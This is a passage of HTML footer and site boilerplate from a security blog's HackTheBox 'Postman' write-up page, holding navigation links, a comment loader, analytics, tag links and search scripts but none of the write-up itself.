f...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/htb-friendzone/" class="btn btn-outline-primary"><p>HackTheBox - FriendZone</p></a> <a href="/posts/htb-openadmin/" class="btn btn-outline-primary"><p>HackTheBox - OpenAdmin</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-2"><p class="font-italic text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/js/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//amirr0r-github-io.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://amirr0r.github.io/posts/htb-postman/'; this.page.identifier = '/posts/htb-postman/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://github.com/amirr0r">amirr0r</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://amirr0r.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
